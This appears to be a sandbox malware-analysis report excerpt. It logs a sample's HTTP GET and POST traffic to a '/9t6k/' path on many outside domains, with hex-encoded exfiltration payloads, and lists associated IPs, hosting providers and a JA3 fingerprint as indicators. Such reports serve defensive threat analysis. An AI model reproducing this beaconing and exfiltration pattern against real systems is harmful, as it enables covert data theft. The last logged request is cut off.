Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.sportsbookmatcher.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.sportsbookmatcher.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4c 36 6c 46 69 57 39 4b 57 6e 51 57 4c 39 6c 62 63 42 37 51 54 59 4a 34 6c 79 6c 78 4c 51 75 72 37 48 74 57 38 52 39 37 6d 61 69 33 67 78 46 5f 57 47 79 68 6d 4d 65 33 51 2d 53 61 5a 53 4a 31 70 55 44 34 57 39 41 64 56 58 36 41 32 63 37 71 7e 43 77 73 31 37 55 43 78 43 61 5f 48 6f 4a 79 54 51 52 37 48 79 6a 67 4b 30 59 73 59 43 45 2d 47 56 31 35 6e 74 75 49 72 54 48 6c 65 66 4f 55 39 66 4d 47 37 72 75 67 36 77 35 54 4d 59 28 73 6b 4d 62 58 6a 59 45 30 6e 61 51 52 61 30 58 42 72 43 44 6a 73 64 71 4b 57 39 62 32 37 72 32 48 57 54 33 4d 69 6b 76 5a 71 50 66 6e 52 64 30 64 35 6d 47 77 79 69 39 4e 7a 50 74 61 76 49 6d 36 4f 42 41 71 51 56 44 56 77 57 4a 7a 28 42 63 6a 49 63 7a 47 75 46 70 38 50 4e 45 56 7e 61 70 61 74 4e 56 57 71 39 70 57 4c 48 58 38 50 37 78 62 77 44 75 34 56 50 56 2d 4b 75 76 6b 63 64 32 69 77 50 42 62 37 49 70 64 75 32 69 5f 43 55 57 59 5a 51 35 4a 6d 77 68 57 54 4f 79 58 28 31 51 5a 35 5f 47 6f 52 65 53 5a 55 65 76 74 52 78 79 67 55 62 79 49 46 4f 48 31 4b 64 53 52 4e 47 63 30 36 46 45 48 50 72 4a 53 33 6a 4f 49 76 49 70 5f 6d 6c 49 79 77 68 69 4c 4d 33 71 70 4e 7a 72 35 77 7a 62 36 48 48 41 43 36 46 4c 4f 7e 75 7a 61 35 2d 58 63 6d 46 39 52 39 48 75 55 4b 75 45 4c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=L6lFiW9KWnQWL9lbcB7QTYJ4lylxLQur7HtW8R97mai3gxF_WGyhmMe3Q-SaZSJ1pUD4W9AdVX6A2c7q~Cws17UCxCa_HoJyTQR7HyjgK0YsYCE-GV15ntuIrTHlefOU9fMG7rug6w5TMY(skMbXjYE0naQRa0XBrCDjsdqKW9b27r2HWT3MikvZqPfnRd0d5mGwyi9NzPtavIm6OBAqQVDVwWJz(BcjIczGuFp8PNEV~apatNVWq9pWLHX8P7xbwDu4VPV-Kuvkcd2iwPBb7Ipdu2i_CUWYZQ5JmwhWTOyX(1QZ5_GoReSZUevtRxygUbyIFOH1KdSRNGc06FEHPrJS3jOIvIp_mlIywhiLM3qpNzr5wzb6HHAC6FLO~uza5-XcmF9R9HuUKuELDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.makingdoathome.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.makingdoathome.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.makingdoathome.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 4d 59 68 34 39 6a 61 39 6f 38 63 76 6d 39 62 6d 4f 6d 4d 36 76 64 6e 56 50 4d 63 71 64 37 6c 35 31 72 76 6b 59 73 7a 49 33 57 6d 6d 53 7a 4f 50 28 41 4e 71 68 33 6b 36 6d 33 54 5a 4c 52 5a 41 5a 4b 51 37 52 4d 6a 6a 38 78 54 6d 37 79 70 51 28 69 74 49 78 63 58 37 46 56 76 59 38 38 66 6f 37 6d 36 6a 53 61 68 36 51 51 4c 64 33 4c 4a 5f 4f 73 75 32 44 56 56 44 46 37 6a 57 6a 30 6d 38 51 74 59 6b 36 44 6e 65 6e 35 6c 76 28 41 70 79 59 79 4e 64 69 74 56 68 42 61 48 61 70 6a 52 43 58 59 53 49 7e 45 44 61 4b 6b 57 75 37 35 4f 71 47 6e 50 35 28 4d 46 41 30 31 4e 36 50 69 44 52 61 30 48 72 48 6a 43 39 6f 33 4b 58 4f 65 7e 7a 6b 70 45 74 64 30 33 48 68 68 4b 6b 69 65 6a 4b 37 66 7e 61 4d 6e 33 55 77 6b 6b 4d 63 42 4c 65 55 59 48 43 55 53 6e 55 69 67 50 42 6b 57 4a 70 4c 76 52 50 35 6a 72 57 79 79 37 56 75 65 45 7a 45 6d 68 30 73 6a 39 62 44 32 73 79 6d 4e 58 55 37 4c 46 49 78 4f 30 33 37 62 73 7a 79 43 35 31 69 39 7e 72 79 77 30 57 69 4d 67 49 78 67 43 37 4a 61 76 70 66 4a 4e 7a 76 6a 77 5a 44 37 72 61 7a 4e 6f 4d 4e 46 64 4c 34 6c 65 34 51 78 66 30 43 4e 6a 52 32 62 36 76 6d 50 6f 49 38 5a 50 57 39 72 58 41 71 52 75 37 4b 73 4b 51 52 35 4a 6d 4a 6d 67 79 55 56 30 49 75 57 4a 72 55 78 51 76 36 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=MYh49ja9o8cvm9bmOmM6vdnVPMcqd7l51rvkYszI3WmmSzOP(ANqh3k6m3TZLRZAZKQ7RMjj8xTm7ypQ(itIxcX7FVvY88fo7m6jSah6QQLd3LJ_Osu2DVVDF7jWj0m8QtYk6Dnen5lv(ApyYyNditVhBaHapjRCXYSI~EDaKkWu75OqGnP5(MFA01N6PiDRa0HrHjC9o3KXOe~zkpEtd03HhhKkiejK7f~aMn3UwkkMcBLeUYHCUSnUigPBkWJpLvRP5jrWyy7VueEzEmh0sj9bD2symNXU7LFIxO037bszyC51i9~ryw0WiMgIxgC7JavpfJNzvjwZD7razNoMNFdL4le4Qxf0CNjR2b6vmPoI8ZPW9rXAqRu7KsKQR5JmJmgyUV0IuWJrUxQv6A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.rodgroup.netConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.rodgroup.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.rodgroup.net/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 78 58 33 30 78 53 34 72 49 4c 54 5f 4d 79 35 71 74 4c 37 2d 6f 48 6e 71 39 32 4b 4d 59 69 57 75 52 59 55 6e 33 4f 5a 75 39 61 42 52 43 49 5a 36 37 5a 76 50 6d 32 54 62 42 6d 46 4b 49 2d 4d 31 79 71 66 52 5a 55 56 4f 4e 41 41 69 74 51 4a 71 6a 44 43 35 7a 4e 54 41 28 72 6e 43 70 76 64 62 63 79 78 58 6f 43 43 61 66 77 52 79 71 67 6d 50 6e 71 78 6a 35 6d 57 51 6c 58 37 74 54 50 69 62 71 77 35 32 4a 39 61 6f 58 33 31 34 6c 62 28 65 53 73 69 34 6a 45 49 2d 39 66 50 38 37 58 71 2d 57 6b 71 39 69 4d 6c 4b 46 78 53 30 53 72 32 57 7a 43 56 64 38 4d 54 65 53 32 66 31 45 72 66 44 37 57 59 71 34 4c 50 4d 57 70 66 63 47 59 44 73 36 6d 47 71 48 30 68 6f 64 37 71 44 41 4f 52 5a 52 47 65 76 6c 53 41 51 71 6d 39 30 4f 51 33 56 38 72 38 53 42 6a 52 56 51 4c 5a 57 54 65 45 46 6f 53 77 61 52 5a 38 52 64 50 42 33 43 6b 52 48 7a 6f 78 56 73 33 62 79 57 73 56 66 65 57 53 35 6d 79 55 46 76 6e 71 77 6d 49 69 31 77 63 6c 54 4e 4f 34 31 7a 4a 35 62 77 71 31 50 4e 30 52 56 70 5f 4d 59 59 4f 67 45 76 4a 79 52 43 6d 68 46 51 78 66 57 38 46 50 65 73 31 65 77 48 73 67 76 7e 6d 46 75 79 41 79 70 46 5f 79 64 71 48 31 47 39 2d 67 68 71 65 6d 37 63 74 57 44 39 76 67 67 4d 77 38 70 79 46 6c 52 55 6d 63 5f 68 31 45 75 78 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=xX30xS4rILT_My5qtL7-oHnq92KMYiWuRYUn3OZu9aBRCIZ67ZvPm2TbBmFKI-M1yqfRZUVONAAitQJqjDC5zNTA(rnCpvdbcyxXoCCafwRyqgmPnqxj5mWQlX7tTPibqw52J9aoX314lb(eSsi4jEI-9fP87Xq-Wkq9iMlKFxS0Sr2WzCVd8MTeS2f1ErfD7WYq4LPMWpfcGYDs6mGqH0hod7qDAORZRGevlSAQqm90OQ3V8r8SBjRVQLZWTeEFoSwaRZ8RdPB3CkRHzoxVs3byWsVfeWS5myUFvnqwmIi1wclTNO41zJ5bwq1PN0RVp_MYYOgEvJyRCmhFQxfW8FPes1ewHsgv~mFuyAypF_ydqH1G9-ghqem7ctWD9vggMw8pyFlRUmc_h1Euxw).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.buttsliders.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.buttsliders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.buttsliders.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 69 58 65 51 46 6f 76 76 31 30 77 6f 50 32 68 78 42 78 32 48 55 32 58 49 70 57 54 30 30 54 38 75 69 48 6d 5f 70 7a 43 54 38 49 71 70 76 42 65 6a 37 6b 52 33 63 52 63 68 76 6a 76 33 4a 6f 69 7a 72 6e 4c 34 6f 5f 73 4e 37 69 67 37 31 38 31 4b 43 38 49 5f 53 4b 36 35 41 68 57 4d 74 77 33 75 6d 31 36 36 74 48 28 54 4d 41 4a 4d 68 61 78 47 59 52 4c 76 6b 65 41 61 69 37 41 78 66 35 6f 75 4e 52 34 77 62 6c 6c 52 65 7a 78 35 65 4b 77 4e 65 50 63 47 46 75 62 70 64 37 69 6e 34 4f 36 58 61 6d 6c 71 64 68 4e 34 75 46 4c 54 71 47 39 70 7a 67 58 4f 68 65 28 44 51 6b 32 68 5a 58 4b 35 73 2d 6c 72 56 4e 64 6a 55 62 70 31 63 48 70 30 56 6b 44 78 46 5f 43 34 4c 57 70 36 34 57 28 4a 55 56 7e 4d 59 47 34 56 70 30 61 59 35 6e 65 62 33 6a 69 65 4e 61 77 65 55 41 4f 77 6e 77 71 42 45 4a 31 72 43 4f 34 77 78 59 36 42 69 57 4d 4e 51 4a 75 31 53 6f 66 4e 45 73 49 52 66 53 38 71 55 71 68 5a 70 6c 52 74 45 79 4f 71 61 61 62 66 70 73 4a 57 34 6b 53 38 73 55 79 36 62 33 58 79 5a 55 6a 6b 6c 54 77 4f 64 56 77 39 69 72 53 56 6c 57 56 41 31 48 5a 57 43 4c 4e 42 49 61 61 62 55 5f 31 39 55 6d 50 76 45 33 31 35 61 47 48 64 6f 53 54 77 73 4e 38 31 50 36 62 32 64 31 4c 62 31 5f 63 72 7e 30 49 74 6c 75 67 61 6b 2d 4e 6e 58 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=iXeQFovv10woP2hxBx2HU2XIpWT00T8uiHm_pzCT8IqpvBej7kR3cRchvjv3JoizrnL4o_sN7ig7181KC8I_SK65AhWMtw3um166tH(TMAJMhaxGYRLvkeAai7Axf5ouNR4wbllRezx5eKwNePcGFubpd7in4O6XamlqdhN4uFLTqG9pzgXOhe(DQk2hZXK5s-lrVNdjUbp1cHp0VkDxF_C4LWp64W(JUV~MYG4Vp0aY5neb3jieNaweUAOwnwqBEJ1rCO4wxY6BiWMNQJu1SofNEsIRfS8qUqhZplRtEyOqaabfpsJW4kS8sUy6b3XyZUjklTwOdVw9irSVlWVA1HZWCLNBIaabU_19UmPvE315aGHdoSTwsN81P6b2d1Lb1_cr~0Itlugak-NnXA).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.thanksforlove.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.thanksforlove.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.thanksforlove.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 72 52 70 6b 6b 58 33 32 4a 44 73 57 47 78 5a 31 6e 4f 77 45 48 36 4d 65 61 70 78 65 79 76 77 45 31 45 6e 69 6c 6f 55 56 63 38 78 57 78 6c 32 34 51 4e 52 6d 70 79 4f 53 4e 35 55 59 35 69 62 70 48 4f 64 67 4c 76 6b 5a 39 6a 4d 71 68 6f 30 65 66 37 73 78 55 33 47 66 31 4a 52 2d 71 4b 28 2d 48 34 48 4c 6d 4f 58 78 78 59 6f 51 51 4c 43 32 64 6d 53 39 4f 35 72 43 4a 37 76 33 43 6d 30 42 70 4f 41 45 39 4d 46 4c 49 2d 48 59 48 48 67 44 6d 5f 4d 4b 73 75 4b 4a 78 61 4e 35 75 76 6e 51 56 69 46 2d 58 48 5a 4c 78 53 62 50 6f 47 56 31 51 4c 54 7a 7a 5f 38 35 57 41 52 45 4b 5f 71 41 6c 39 66 5a 54 49 55 51 6e 69 4f 7a 67 76 63 78 74 62 45 78 30 75 71 6f 56 58 57 78 73 71 70 54 30 4b 6b 4b 6e 72 59 45 43 36 76 75 6b 4a 44 32 6e 69 56 6e 59 31 28 71 53 33 53 73 32 4b 48 58 49 6b 72 59 33 31 71 59 41 71 32 62 57 59 70 64 4b 6d 59 72 50 56 50 61 30 78 34 66 5a 6c 41 51 72 76 53 50 33 58 6b 37 37 59 51 71 6a 4b 6b 34 79 65 69 7a 54 69 7a 4e 38 73 33 75 6d 6f 73 63 4c 47 6d 4e 6c 43 7e 72 38 6a 35 34 32 79 39 4d 77 31 6f 77 54 4a 58 57 36 30 44 34 73 65 31 48 62 39 52 6d 30 30 56 45 77 63 4d 44 4e 6e 33 4d 41 49 57 6c 51 38 46 5a 7e 33 4d 70 30 51 78 68 41 4b 6a 77 36 42 75 2d 67 38 54 52 4d 70 72 71 59 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=rRpkkX32JDsWGxZ1nOwEH6MeapxeyvwE1EniloUVc8xWxl24QNRmpyOSN5UY5ibpHOdgLvkZ9jMqho0ef7sxU3Gf1JR-qK(-H4HLmOXxxYoQQLC2dmS9O5rCJ7v3Cm0BpOAE9MFLI-HYHHgDm_MKsuKJxaN5uvnQViF-XHZLxSbPoGV1QLTzz_85WAREK_qAl9fZTIUQniOzgvcxtbEx0uqoVXWxsqpT0KkKnrYEC6vukJD2niVnY1(qS3Ss2KHXIkrY31qYAq2bWYpdKmYrPVPa0x4fZlAQrvSP3Xk77YQqjKk4yeizTizN8s3umoscLGmNlC~r8j542y9Mw1owTJXW60D4se1Hb9Rm00VEwcMDNn3MAIWlQ8FZ~3Mp0QxhAKjw6Bu-g8TRMprqYg).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.outtheframecustoms.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.outtheframecustoms.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.outtheframecustoms.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 55 2d 77 75 54 6f 51 53 30 35 54 63 4e 35 51 57 34 79 70 71 32 6f 74 4c 31 51 4e 7a 42 4d 51 33 5a 4b 72 4e 4d 56 6e 6a 35 45 42 41 63 72 64 35 54 7a 78 67 34 61 37 71 4f 47 67 75 4e 47 6c 54 4e 7a 34 4b 6f 7a 46 38 67 4d 65 39 77 6c 38 37 70 6f 49 56 69 78 61 58 73 7a 46 53 64 31 56 77 6b 46 64 61 31 46 69 4c 75 52 46 4a 50 6b 43 38 57 30 4e 6c 48 32 58 68 28 53 5a 46 45 62 77 78 55 50 55 5a 4b 46 47 61 6d 4a 4d 32 53 70 34 59 33 55 6f 4c 43 33 70 30 52 78 47 4e 49 52 72 46 4d 69 4c 30 31 58 42 36 64 45 7a 2d 47 35 65 4f 56 36 57 72 4f 74 63 76 32 39 6b 74 78 73 4d 5f 4d 50 6d 4b 4b 35 43 30 61 48 69 55 6a 53 45 43 4b 53 45 36 74 66 32 74 54 5a 7a 41 62 49 47 65 65 42 37 55 31 72 56 72 74 58 77 36 53 47 6b 41 4f 6b 78 2d 4e 64 73 56 66 57 45 69 58 6c 57 58 4a 6e 46 54 53 64 63 6e 6b 33 7a 76 4d 65 72 53 7e 61 79 36 68 56 46 34 38 4f 38 69 56 4d 55 5f 74 48 6d 35 30 56 58 30 55 33 53 47 7e 49 73 4d 52 6c 6f 53 59 55 52 77 6c 66 43 33 31 35 35 54 53 6b 5a 74 69 64 6f 55 76 4f 50 51 6c 52 74 57 7e 31 43 36 51 64 46 55 71 78 68 6a 39 73 6a 44 65 35 4a 66 58 41 65 6b 65 44 65 38 72 57 51 54 75 54 48 56 48 32 57 66 63 78 33 79 61 55 63 64 52 64 30 48 4b 4f 55 36 64 7a 49 45 42 55 58 37 58 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=U-wuToQS05TcN5QW4ypq2otL1QNzBMQ3ZKrNMVnj5EBAcrd5Tzxg4a7qOGguNGlTNz4KozF8gMe9wl87poIVixaXszFSd1VwkFda1FiLuRFJPkC8W0NlH2Xh(SZFEbwxUPUZKFGamJM2Sp4Y3UoLC3p0RxGNIRrFMiL01XB6dEz-G5eOV6WrOtcv29ktxsM_MPmKK5C0aHiUjSECKSE6tf2tTZzAbIGeeB7U1rVrtXw6SGkAOkx-NdsVfWEiXlWXJnFTSdcnk3zvMerS~ay6hVF48O8iVMU_tHm50VX0U3SG~IsMRloSYURwlfC3155TSkZtidoUvOPQlRtW~1C6QdFUqxhj9sjDe5JfXAekeDe8rWQTuTHVH2Wfcx3yaUcdRd0HKOU6dzIEBUX7XQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.theyolokart.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.theyolokart.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.theyolokart.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 28 78 65 56 4c 30 48 61 6e 6f 77 56 4b 36 74 6c 54 46 75 59 46 44 4f 58 49 44 44 64 45 54 79 43 30 33 62 4f 32 4f 75 4e 4d 76 62 66 42 68 64 31 72 42 70 49 75 56 39 6b 75 74 67 58 6e 54 34 47 63 7a 67 6d 62 4e 67 6f 42 55 4a 39 76 34 5a 6c 4e 50 6b 74 64 4d 42 6a 28 39 51 64 4b 42 33 4e 51 39 38 4f 71 4b 73 58 28 66 72 6d 4f 32 6a 33 55 38 72 6a 70 79 39 66 56 6b 78 37 45 64 6b 53 44 4a 44 58 39 57 4a 4d 45 38 34 66 4e 38 32 34 4f 53 65 74 65 56 52 54 77 64 78 67 65 67 52 48 39 7a 4f 71 28 2d 7e 7a 71 4a 35 43 6c 59 68 55 62 63 54 68 37 6a 49 52 72 59 46 79 44 4b 74 57 43 75 41 78 6f 74 4c 71 36 67 70 78 6b 55 7e 47 52 72 44 41 4d 39 4d 76 52 4b 59 58 42 31 65 68 45 35 28 50 7e 47 30 63 39 4b 5a 4d 6f 69 47 38 62 75 36 30 69 4d 6f 66 38 35 35 55 39 36 4b 4c 74 72 63 63 4a 39 79 69 32 41 61 56 6b 6b 71 44 4c 4e 39 4f 41 44 31 4e 39 45 49 32 4f 48 7e 30 36 68 59 38 39 34 76 54 56 39 4f 6e 63 63 66 75 28 69 66 65 6a 63 31 57 4f 56 6d 6c 6b 39 39 6d 6b 79 67 6e 52 48 48 6e 30 4c 53 65 48 52 33 64 4c 6d 42 76 77 59 59 33 6f 4d 38 78 34 59 53 64 39 77 59 35 61 65 4a 56 70 56 52 7a 75 30 41 2d 78 5a 37 49 66 5f 68 71 4a 32 5a 64 72 52 28 39 5a 42 53 48 73 68 39 57 5a 51 38 43 59 62 4e 51 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=(xeVL0HanowVK6tlTFuYFDOXIDDdETyC03bO2OuNMvbfBhd1rBpIuV9kutgXnT4GczgmbNgoBUJ9v4ZlNPktdMBj(9QdKB3NQ98OqKsX(frmO2j3U8rjpy9fVkx7EdkSDJDX9WJME84fN824OSeteVRTwdxgegRH9zOq(-~zqJ5ClYhUbcTh7jIRrYFyDKtWCuAxotLq6gpxkU~GRrDAM9MvRKYXB1ehE5(P~G0c9KZMoiG8bu60iMof855U96KLtrccJ9yi2AaVkkqDLN9OAD1N9EI2OH~06hY894vTV9Onccfu(ifejc1WOVmlk99mkygnRHHn0LSeHR3dLmBvwYY3oM8x4YSd9wY5aeJVpVRzu0A-xZ7If_hqJ2ZdrR(9ZBSHsh9WZQ8CYbNQDQ).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.renabbeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.renabbeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.renabbeauty.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 30 31 6d 63 5a 4e 51 58 7e 72 72 67 6e 47 52 2d 41 46 42 43 5a 6f 70 64 32 79 55 31 30 6e 63 46 6c 63 30 49 4f 31 51 70 67 55 68 31 66 30 37 44 41 4d 7e 47 61 72 51 58 4f 78 4d 67 44 34 72 6d 78 6e 65 73 64 4f 4a 6e 48 69 72 43 43 36 35 4f 51 4b 56 44 6c 42 4b 46 66 6a 6d 59 71 37 41 4b 7a 58 42 58 5a 65 59 52 61 79 6c 49 47 77 78 41 58 44 32 35 72 4f 51 58 4a 7a 32 41 54 61 35 43 47 62 34 78 47 46 6b 70 4e 39 6c 7a 48 72 28 44 6b 78 43 6a 6b 33 49 36 48 2d 5a 4c 78 62 6c 6b 4c 32 57 5f 33 71 38 64 48 76 37 37 61 53 58 7a 65 31 35 35 75 30 53 50 51 73 7a 4d 46 66 65 55 6d 62 4c 70 39 56 75 6b 4d 49 59 57 76 32 78 37 31 32 75 38 53 2d 4e 30 6c 45 6a 43 56 39 35 61 68 54 75 6d 66 4c 78 7a 68 41 67 76 28 34 7e 31 74 75 64 6f 39 50 57 31 38 61 45 56 76 72 78 54 6f 38 4c 69 45 76 37 41 65 33 76 5f 77 74 30 31 7e 68 59 70 5a 4e 38 76 7a 4b 46 7a 52 41 62 6e 72 79 6d 34 77 71 68 35 6a 58 77 32 79 79 4a 59 4f 69 6d 32 39 76 69 73 58 31 6e 5f 49 74 67 65 72 6d 58 42 71 55 35 59 6f 68 36 59 59 48 4a 36 77 63 31 45 4d 44 4b 4d 6f 73 79 41 52 58 66 62 71 54 38 4b 66 78 7e 5f 75 68 43 30 57 63 77 65 31 70 77 4a 77 79 65 4c 75 4e 55 46 65 4e 42 31 51 5a 62 59 4b 35 56 36 52 57 35 31 7a 61 4e 5f 37 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: URflh=01mcZNQX~rrgnGR-AFBCZopd2yU10ncFlc0IO1QpgUh1f07DAM~GarQXOxMgD4rmxnesdOJnHirCC65OQKVDlBKFfjmYq7AKzXBXZeYRaylIGwxAXD25rOQXJz2ATa5CGb4xGFkpN9lzHr(DkxCjk3I6H-ZLxblkL2W_3q8dHv77aSXze155u0SPQszMFfeUmbLp9VukMIYWv2x712u8S-N0lEjCV95ahTumfLxzhAgv(4~1tudo9PW18aEVvrxTo8LiEv7Ae3v_wt01~hYpZN8vzKFzRAbnrym4wqh5jXw2yyJYOim29visX1n_ItgermXBqU5Yoh6YYHJ6wc1EMDKMosyARXfbqT8Kfx~_uhC0Wcwe1pwJwyeLuNUFeNB1QZbYK5V6RW51zaN_7A).
Source: global traffic	HTTP traffic detected: POST /9t6k/ HTTP/1.1Host: www.ahomedokita.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ahomedokita.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ahomedokita.com/9t6k/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 52 66 6c 68 3d 32 61 76 61 38 79 71 43 6a 6f 52 49 4c 63 65 58 45 56 4d 5f 63 4a 43 33 28 38 4b 58 66 36 39 66 48 36 55 64 79 32 6b 61 74 44 5a 66 55 4b 6e 73 55 57 4e 6e 56 35 33 43 47 76 57 4e 58 45 62 49 54 57 49 4e 35 6d 79 44 7a 5a 71 36 32 2d 45 46 30 77 66 56 39 57 30 42 63 56 37 67 6a 6d 34 6c 39 53 28 36 62 76 45 6b 36 45 7a 2d 68 77 32 4e 4d 79 73 33 64 63 7e 63 56 65 46 64 7a 64 69 66 62 47 48 75 66 64 48 74 76 4d 51 5f 6e 4a 6c 62 50 75 47 34 6d 73 36 39 63 54 38 6f 6b 41 72 74 4c 38 49 35 7e 4b 73 73 46 6e 6a 65 55 4e 44 46 66 71 49 76 4a 70 39 4a 73 56 59 46 30 5f 46 41 69 43 6c 70 62 71 56 46 6d 31 5a 55 50 6c 4a 4e 46 64 30 31 77 35 77 4f 70 2d 6d 48 71 51 31 6c 7a 5a 72 5f 4d 4a 41 55 37 76 33 32 34 63 63 54 70 63 46 69 6f 41 73 75 6d 6e 4d 37 4f 5f 34 63 34 45 76 78 33 47 41 34 4e 37 7a 34 74 49 54 7a 41 48 4a 58 56 5a 4b 71 37 4e 31 38 30 55 75 48 51 55 56 57 31 5f 28 55 78 78 7e 54 38 6e 38 79 41 42 67 62 4d 67 6b 78 4f 75 36 79 30 35 63 71 6d 43 38 6a 58 75 68 73 78 31 6a 52 58 41 4b 72 39 64 7a 41 37 73 28 42 35 4f 76 59 31 41 48 6a 6d 31 30 43 69 6e 7a 4c 41 7a 6c 74 35 79 61 56 35 77 63 7a 4f 7a 77 56 48 42 59 75 64 31 6c 66 62 48 37 71 73 39 64 71 35 56 6a 66 4a 74 34 6a 42 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 